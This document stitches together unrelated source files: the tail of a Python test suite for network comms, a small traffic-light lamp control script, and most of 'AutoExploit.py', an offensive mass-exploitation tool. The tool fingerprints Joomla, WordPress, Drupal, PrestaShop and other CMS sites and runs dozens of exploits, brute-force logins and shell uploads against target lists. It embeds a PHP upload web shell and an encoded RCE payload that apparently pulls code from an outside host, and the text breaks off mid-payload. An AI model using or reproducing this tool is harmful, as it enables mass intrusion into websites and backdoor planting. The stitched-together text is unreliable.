got = yield b.read()
yield b.write(got)
got = yield a.read()
assert sorted(got) == sorted(msg)
for k in ('op', 'x'):
assert got[k] == msg[k]
if should_deserialize:
assert isinstance(got['to_ser'][0], (bytes, bytearray))
assert isinstance(got['ser'], (bytes, bytearray))
else:
assert isinstance(got['to_ser'][0], (to_serialize, Serialized))
assert isinstance(got['ser'], Serialized)
@gen_test()
def test_inproc_deserialize_roundtrip():
yield check_deserialize_roundtrip('inproc://')
@gen_test()
def test_tcp_deserialize_roundtrip():
yield check_deserialize_roundtrip('tcp://')
def _raise_eoferror():
raise EOFError
class _EOFRaising(object):
def __reduce__(self):
return _raise_eoferror, ()
@gen.coroutine
def check_deserialize_eoferror(addr):
"""
EOFError when deserializing should close the comm.
"""
@gen.coroutine
def handle_comm(comm):
yield comm.write({'data': to_serialize(_EOFRaising())})
with pytest.raises(CommClosedError):
yield comm.read()
with listen(addr, handle_comm) as listener:
comm = yield connect(listener.contact_address, deserialize=deserialize)
with pytest.raises(CommClosedError):
yield comm.read()
@gen_test()
def test_tcp_deserialize_eoferror():
yield check_deserialize_eoferror('tcp://')
#
# Test various properties
#
@gen.coroutine
def check_repr(a, b):
assert 'closed' not in repr(a)
assert 'closed' not in repr(b)
yield a.close()
assert 'closed' in repr(a)
yield b.close()
assert 'closed' in repr(b)
@gen_test()
def test_tcp_repr():
a, b = yield get_tcp_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
yield check_repr(a, b)
@gen_test()
def test_tls_repr():
a, b = yield get_tls_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
yield check_repr(a, b)
@gen_test()
def test_inproc_repr():
a, b = yield get_inproc_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
yield check_repr(a, b)
@gen.coroutine
def check_addresses(a, b):
assert a.peer_address == b.local_address
assert a.local_address == b.peer_address
a.abort()
b.abort()
@gen_test()
def test_tcp_adresses():
a, b = yield get_tcp_comm_pair()
yield check_addresses(a, b)
@gen_test()
def test_tls_adresses():
a, b = yield get_tls_comm_pair()
yield check_addresses(a, b)
@gen_test()
def test_inproc_adresses():
a, b = yield get_inproc_comm_pair()
yield check_addresses(a, b)
|
ampel.py
|
import subprocess
import threading
import time
import traceback
import common
import config
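# Ampel wraps an external command-line tool (presumably a Cleware traffic
# light, given config.cleware_exec): signal() switches a single lamp with
# '-as <order> <0|1>', flash() blinks all three lamps on a background thread
# for `duration` seconds, and check_status() runs the tool with '-l' and
# returns (returncode, output).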
class Ampel:
def __init__(self, base_command):
self.base_command = base_command
def signal(self, order, switchto):
switch = '1' if switchto else '0'
cmd = self.base_command + ['-as', str(order), switch]
return subprocess.check_output(cmd, stderr=subprocess.STDOUT)
def flash(self, duration):
def do_flash():
try:
started = time.time()
while True:
elapsed = time.time() - started
if elapsed > duration:
[self.signal(x, 0) for x in range(3)]
return
else:
[self.signal(x, 1) for x in range(3)]
time.sleep(1)
[self.signal(x, 0) for x in range(3)]
except:
tb = traceback.format_exc()
common.error(tb)
flash_thread = threading.Thread(target=do_flash)
flash_thread.start()
return flash_thread
def check_status(self):
try:
out = subprocess.check_output(self.base_command + ['-l'], stderr=subprocess.STDOUT)
return 0, out
except subprocess.CalledProcessError as e:
return e.returncode, e.output
if __name__ == '__main__':
ampel = Ampel(config.cleware_exec)
    out = ampel.signal(0, 1)  # signal() returns only the command output, so there is no return code to unpack
|
AutoExploit.py
|
#!/usr/bin/python27
import os, re, sys, socket, binascii, time, json, random, threading
from Queue import Queue
try:
import requests
except ImportError:
print '---------------------------------------------------'
print '[*] pip install requests'
print ' [-] you need to install requests Module'
sys.exit()
class AutoExploiter(object):
def __init__(self):
try:
os.mkdir('result')
except:
pass
try:
os.mkdir('logs')
except:
pass
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.shell_code = '''
<title>wordpress_project</title>
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
else { echo '<b>Not uploaded ! </b><br><br>'; }
}
?>
'''
self.version = '1.5.1'
self.year = time.strftime("%y")
self.month = time.strftime("%m")
self.EMail = 'email@email.com' # --> add your email for Add admin, Password Will send to this EMail!
self.Jce_Deface_image = 'files/pwn.gif'
self._shell = 'files/shell.jpg'
self.indeX = 'files/index.jpg'
self.TextindeX = 'files/vuln.txt'
self.MailPoetZipShell = 'files/rock.zip'
self.ZipJd = 'files/jdownlods.zip'
self.pagelinesExploitShell = 'files/settings_auto.php'
self.jdShell = 'files/vuln.php3.j'
self.ShellPresta = 'files/up.php'
self.gravShell = 'files/grav.jpg'
try:
self.select = sys.argv[1]
except:
self.cls()
self.print_logo()
self.Print_options()
sys.exit()
if self.select == str('1'): # Single
self.cls()
self.print_logo()
self.Url = raw_input(self.r + ' [+]' + self.c + 'Enter Target: ' + self.y)
if self.Url.startswith("http://"):
self.Url = self.Url.replace("http://", "")
elif self.Url.startswith("https://"):
self.Url = self.Url.replace("https://", "")
else:
pass
try:
CheckOsc = requests.get('http://' + self.Url + '/admin/images/cal_date_over.gif', timeout=10)
CheckOsc2 = requests.get('http://' + self.Url + '/admin/login.php', timeout=10)
CheckCMS = requests.get('http://' + self.Url + '/templates/system/css/system.css', timeout=5)
Checktwo = requests.get('http://' + self.Url, timeout=5)
if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
self.Print_Scanning(self.Url, 'joomla')
self.RCE_Joomla(self.Url)
self.Joomla_TakeADmin(self.Url)
self.Com_AdsManager_Shell(self.Url)
self.alberghiExploit(self.Url)
self.Com_CCkJseblod(self.Url)
self.Com_Fabric(self.Url)
self.Com_Hdflvplayer(self.Url)
self.Com_Jdownloads_shell(self.Url)
self.Com_Joomanager(self.Url)
self.Com_MyBlog(self.Url)
self.Com_Macgallery(self.Url)
self.JCE_shell(self.Url)
self.Com_s5_media_player(self.Url)
self.Com_Jbcatalog(self.Url)
self.Com_SexyContactform(self.Url)
self.Com_rokdownloads(self.Url)
self.Com_extplorer(self.Url)
self.Com_jwallpapers_Shell(self.Url)
self.Com_facileforms(self.Url)
self.JooMLaBruteForce(self.Url)
self.FckEditor(self.Url)
elif '/wp-content/' in Checktwo.text.encode('utf-8'):
self.Print_Scanning(self.Url, 'Wordpress')
self.Revslider_SHELL(self.Url)
self.wysijaExploit(self.Url)
self.WP_User_Frontend(self.Url)
self.Gravity_Forms_Shell(self.Url)
self.HD_WebPlayerSqli(self.Url)
self.pagelinesExploit(self.Url)
self.HeadWayThemeExploit(self.Url)
self.addblockblocker(self.Url)
self.cherry_plugin(self.Url)
self.formcraftExploit_Shell(self.Url)
self.UserProExploit(self.Url)
self.wp_mobile_detector(self.Url)
self.Wp_Job_Manager(self.Url)
self.wp_content_injection(self.Url)
self.Woocomrece(self.Url)
self.viral_optins(self.Url)
self.CateGory_page_icons(self.Url)
self.Downloads_Manager(self.Url)
self.wp_support_plus_responsive_ticket_system(self.Url)
self.wp_miniaudioplayer(self.Url)
self.eshop_magic(self.Url)
self.ungallery(self.Url)
self.barclaycart(self.Url)
self.FckEditor(self.Url)
elif '/sites/default/' in Checktwo.text.encode('utf-8')\
or 'content="Drupal' in Checktwo.text.encode('utf-8'):
self.Print_Scanning(self.Url, 'drupal')
self.DrupalGedden2(self.Url)
self.DrupalBruteForce(self.Url)
self.Drupal_Sqli_Addadmin(self.Url)
self.FckEditor(self.Url)
elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
self.Print_Scanning(self.Url, 'osCommerce')
self.osCommerce(self.Url)
self.FckEditor(self.Url)
elif 'prestashop' in Checktwo.text.encode('utf-8'):
self.lib(self.Url)
self.psmodthemeoptionpanel(self.Url)
self.tdpsthemeoptionpanel(self.Url)
self.megamenu(self.Url)
self.nvn_export_orders(self.Url)
self.pk_flexmenu(self.Url)
self.wdoptionpanel(self.Url)
self.fieldvmegamenu(self.Url)
self.wg24themeadministration(self.Url)
self.videostab(self.Url)
self.cartabandonmentproOld(self.Url)
self.cartabandonmentpro(self.Url)
self.advancedslider(self.Url)
self.attributewizardpro_x(self.Url)
self.attributewizardpro3(self.Url)
self.attributewizardpro2(self.Url)
self.attributewizardpro(self.Url)
self.jro_homepageadvertise(self.Url)
self.homepageadvertise2(self.Url)
self.homepageadvertise(self.Url)
self.productpageadverts(self.Url)
self.simpleslideshow(self.Url)
self.vtermslideshow(self.Url)
self.soopabanners(self.Url)
self.soopamobile(self.Url)
self.columnadverts(self.Url)
self.FckEditor(self.Url)
elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
self.OpenCart(self.Url)
self.FckEditor(self.Url)
else:
self.Print_Scanning(self.Url, 'Unknown')
self.FckEditor(self.Url)
except:
self.Timeout(self.Url)
sys.exit()
elif self.select == str('2'): # multi List
self.cls()
try:
self.print_logo()
Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
with open(Get_list, 'r') as zz:
Readlist = zz.read().splitlines()
except IOError:
print self.r + '--------------------------------------------'
print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
sys.exit()
thread = []
for xx in Readlist:
t = threading.Thread(target=self.Work2, args=(xx, ''))
t.start()
thread.append(t)
time.sleep(0.1)
for j in thread:
j.join()
elif self.select == str('4'):
try:
self.cls()
self.print_logo()
GoT = requests.get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/update.txt', timeout=5)
if self.version in GoT.text.encode('utf-8'):
print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c +\
"Sorry But You Don't Have New Update ... Try later."
else:
Loop = True
print self.r + ' [' + self.c + '+' + self.r + '] ' + self.g + 'update Is available! Update Now.'
print self.r + ' [' + self.c + '+' + self.r + '] ' + self.y + 'github.com/04x/ICG-AutoExploiterBoT/\n'
while Loop:
Get = raw_input(self.r + ' [' + self.g + '*' + self.r + '] ' + self.c +
'You Want know What is New in New Version ? [y]es or [n]o : ')
if Get == str('y'):
update_details = requests.get('https://raw.githubusercontent.com/'
'04x/ICG-AutoExploiterBoT/master/files/update_details.txt', timeout=5)
print update_details.text.encode('utf-8')
Loop = False
elif Get == str('n'):
self.cls()
self.print_logo()
Loop = False
else:
continue
except:
self.Timeout('Github.com')
elif self.select == str('3'):
self.cls()
self.print_logo()
self.concurrent = 75
try:
self.Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
except IOError:
print self.r + '--------------------------------------------'
print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
sys.exit()
self.q = Queue(self.concurrent * 2)
for i in range(self.concurrent):
self.t = threading.Thread(target=self.doWork)
self.t.daemon = True
self.t.start()
try:
for url in open(self.Get_list):
self.q.put(url.strip())
self.q.join()
except:
pass
else:
self.cls()
self.print_logo()
print self.r + '--------------------------------------------'
print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + ' Option Not Found! Try Again...'
# elif self.select == str(3): # IP Server
# self.cls()
# IPserv = raw_input(' Enter IP server: ')
# reverse = reverse_ipz()
# reverse.Reverse_ip(IPserv)
# try:
# with open('logs/' + reverse.ip + '.txt', 'r') as reader:
# readlines = reader.read().splitlines()
# except:
# print ' i cant Find List of urls in server! use from option 2.'
# sys.exit()
# for xx in readlines:
# self.Url = xx
# if self.Url.startswith("http://"):
# self.Url = self.Url.replace("http://", "")
# elif self.Url.startswith("https://"):
# self.Url = self.Url.replace("https://", "")
# else:
# pass
# try:
# CheckCMS = requests.get('http://' + self.Url + '/language/en-GB/en-GB.xml', timeout=7)
# if 'version="' in CheckCMS.text.encode('utf-8'):
# self.Print_Scanning(self.Url, 'joomla')
# self.RCE_Joomla()
# self.Joomla_TakeADmin()
# self.Com_AdsManager_Shell()
# self.alberghiExploit()
# self.Com_CCkJseblod()
# self.Com_Fabric()
# self.Com_Hdflvplayer()
# self.Com_Jdownloads_shell()
# self.Com_Joomanager()
# self.Com_MyBlog()
# self.Com_Macgallery()
# self.JCE_shell()
# self.Com_s5_media_player()
# else:
# self.Print_Scanning(self.Url, 'Unknown')
# except requests.ConnectionError:
# self.Timeout(self.Url)
def Work2(self, url, s):
try:
if url.startswith("http://"):
url = url.replace("http://", "")
elif url.startswith("https://"):
url = url.replace("https://", "")
else:
pass
CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
Checktwo = requests.get('http://' + url, timeout=5)
if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
self.RCE_Joomla(url)
self.Joomla_TakeADmin(url)
self.Com_AdsManager_Shell(url)
self.alberghiExploit(url)
self.Com_CCkJseblod(url)
self.Com_Fabric(url)
self.Com_Hdflvplayer(url)
self.Com_Jdownloads_shell(url)
self.Com_Joomanager(url)
self.Com_MyBlog(url)
self.Com_Macgallery(url)
self.JCE_shell(url)
self.Com_s5_media_player(url)
self.Com_Jbcatalog(url)
self.Com_SexyContactform(url)
self.Com_rokdownloads(url)
self.Com_extplorer(url)
self.Com_jwallpapers_Shell(url)
self.Com_facileforms(url)
self.JooMLaBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif '/wp-content/' in Checktwo.text.encode('utf-8'):
self.Revslider_SHELL(url)
self.wysijaExploit(url)
self.WP_User_Frontend(url)
self.Gravity_Forms_Shell(url)
self.HD_WebPlayerSqli(url)
self.pagelinesExploit(url)
self.HeadWayThemeExploit(url)
self.addblockblocker(url)
self.cherry_plugin(url)
self.formcraftExploit_Shell(url)
self.UserProExploit(url)
self.wp_mobile_detector(url)
self.Wp_Job_Manager(url)
self.wp_content_injection(url)
self.viral_optins(url)
self.Woocomrece(url)
self.CateGory_page_icons(url)
self.Downloads_Manager(url)
self.wp_support_plus_responsive_ticket_system(url)
self.wp_miniaudioplayer(url)
self.eshop_magic(url)
self.ungallery(url)
self.barclaycart(url)
self.FckEditor(url)
self.q.task_done()
elif '/sites/default/' in Checktwo.text.encode('utf-8') \
or 'content="Drupal' in Checktwo.text.encode('utf-8'):
self.Drupal_Sqli_Addadmin(url)
self.DrupalGedden2(url)
self.DrupalBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
self.osCommerce(url)
self.FckEditor(url)
self.q.task_done()
elif 'prestashop' in Checktwo.text.encode('utf-8'):
self.lib(url)
self.psmodthemeoptionpanel(url)
self.tdpsthemeoptionpanel(url)
self.megamenu(url)
self.nvn_export_orders(url)
self.pk_flexmenu(url)
self.wdoptionpanel(url)
self.fieldvmegamenu(url)
self.wg24themeadministration(url)
self.videostab(url)
self.cartabandonmentproOld(url)
self.cartabandonmentpro(url)
self.advancedslider(url)
self.attributewizardpro_x(url)
self.attributewizardpro3(url)
self.attributewizardpro2(url)
self.attributewizardpro(url)
self.jro_homepageadvertise(url)
self.homepageadvertise2(url)
self.homepageadvertise(url)
self.productpageadverts(url)
self.simpleslideshow(url)
self.vtermslideshow(url)
self.soopabanners(url)
self.soopamobile(url)
self.columnadverts(url)
self.FckEditor(url)
self.q.task_done()
elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
self.OpenCart(self.Url)
self.FckEditor(self.Url)
self.q.task_done()
else:
self.FckEditor(url)
self.q.task_done()
except:
pass
def doWork(self):
try:
while True:
url = self.q.get()
if url.startswith('http://'):
url = url.replace('http://', '')
elif url.startswith("https://"):
url = url.replace('https://', '')
else:
pass
try:
CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
Checktwo = requests.get('http://' + url, timeout=5)
if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
self.RCE_Joomla(url)
self.Joomla_TakeADmin(url)
self.Com_AdsManager_Shell(url)
self.alberghiExploit(url)
self.Com_CCkJseblod(url)
self.Com_Fabric(url)
self.Com_Hdflvplayer(url)
self.Com_Jdownloads_shell(url)
self.Com_Joomanager(url)
self.Com_MyBlog(url)
self.Com_Macgallery(url)
self.JCE_shell(url)
self.Com_s5_media_player(url)
self.Com_Jbcatalog(url)
self.Com_SexyContactform(url)
self.Com_rokdownloads(url)
self.Com_extplorer(url)
self.Com_jwallpapers_Shell(url)
self.Com_facileforms(url)
self.JooMLaBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif '/wp-content/' in Checktwo.text.encode('utf-8'):
self.Revslider_SHELL(url)
self.wysijaExploit(url)
self.WP_User_Frontend(url)
self.Gravity_Forms_Shell(url)
self.HD_WebPlayerSqli(url)
self.pagelinesExploit(url)
self.HeadWayThemeExploit(url)
self.addblockblocker(url)
self.cherry_plugin(url)
self.formcraftExploit_Shell(url)
self.UserProExploit(url)
self.wp_mobile_detector(url)
self.Wp_Job_Manager(url)
self.wp_content_injection(url)
self.viral_optins(url)
self.Woocomrece(url)
self.CateGory_page_icons(url)
self.Downloads_Manager(url)
self.wp_support_plus_responsive_ticket_system(url)
self.wp_miniaudioplayer(url)
self.eshop_magic(url)
self.ungallery(url)
self.barclaycart(url)
self.FckEditor(url)
self.q.task_done()
elif '/sites/default/' in Checktwo.text.encode('utf-8') \
or 'content="Drupal' in Checktwo.text.encode('utf-8'):
self.Drupal_Sqli_Addadmin(url)
self.DrupalGedden2(url)
self.DrupalBruteForce(url)
self.FckEditor(url)
self.q.task_done()
elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
self.osCommerce(url)
self.FckEditor(url)
self.q.task_done()
elif 'prestashop' in Checktwo.text.encode('utf-8'):
self.lib(url)
self.psmodthemeoptionpanel(url)
self.tdpsthemeoptionpanel(url)
self.megamenu(url)
self.nvn_export_orders(url)
self.pk_flexmenu(url)
self.wdoptionpanel(url)
self.fieldvmegamenu(url)
self.wg24themeadministration(url)
self.videostab(url)
self.cartabandonmentproOld(url)
self.cartabandonmentpro(url)
self.advancedslider(url)
self.attributewizardpro_x(url)
self.attributewizardpro3(url)
self.attributewizardpro2(url)
self.attributewizardpro(url)
self.jro_homepageadvertise(url)
self.homepageadvertise2(url)
self.homepageadvertise(url)
self.productpageadverts(url)
self.simpleslideshow(url)
self.vtermslideshow(url)
self.soopabanners(url)
self.soopamobile(url)
self.columnadverts(url)
self.FckEditor(url)
self.q.task_done()
elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
self.OpenCart(self.Url)
self.FckEditor(self.Url)
self.q.task_done()
else:
self.FckEditor(url)
self.q.task_done()
except:
pass
except:
pass
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
x = """
White HaT Hackers
_ ______ _ _ _
/\ | | | ____| | | (_) |
/ \ _ _| |_ ___ | |__ __ ___ __ | | ___ _| |_ ___ _ __
/ /\ \| | | | __/ _ \| __| \ \/ / '_ \| |/ _ \| | __/ _ \ '__|
/ ____ \ |_| | || (_) | |____ > <| |_) | | (_) | | || __/ |
/_/ \_\__,_|\__\___/|______/_/\_\ .__/|_|\___/|_|\__\___|_|
| |
IRan-Cyber.Net |_| gitHub.com/04x
Note! : We don't Accept any responsibility for any illegal usage.
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def Print_options(self):
print self.r + ' [' + self.y + '1' + self.r + '] ' + self.c + 'Single Target' + self.w +\
' [ ' + 'python AutoExploit.py 1' + ' ]'
print self.r + ' [' + self.y + '2' + self.r + '] ' + self.c + 'List Scan' + self.w + ' [ ' + 'python AutoExploit.py 2' + ' ]'
print self.r + ' [' + self.y + '3' + self.r + '] ' + self.c + 'Thread List Scan' + self.w + ' [ ' + 'python AutoExploit.py 3' + ' ]'
print self.r + ' [' + self.y + '4' + self.r + '] ' + self.c + 'Check Update' + self.w + ' [ ' + 'python AutoExploit.py 4' + ' ]'
def Print_Scanning(self, url, CMS):
print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.w + ' [ ' + CMS + ' ]'
def Timeout(self, url):
print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.r + ' [ TimeOut!!/NotValid Url ]'
def Print_NotVuln(self, NameVuln, site):
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
def Print_Username_Password(self, username, Password):
print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Username: ' + self.g + username
print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Password: ' + self.g + Password
def Print_Vuln(self, NameVuln, site):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.g + ' [Vuln!!]'
def Print_Vuln_index(self, indexPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
def Print_vuln_Shell(self, shellPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
def Print_vuln_Config(self, pathconfig):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + pathconfig + self.g + ' [Config Downloaded!]'
def cls(self):
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def RCE_Joomla(self, site):
try:
pl = self.generate_payload(
"base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJVOVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBkWEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pHbHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlkWE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFYUmxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFabUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNBektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnApOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2ltYWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIpOw0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQU0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tKdlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzB
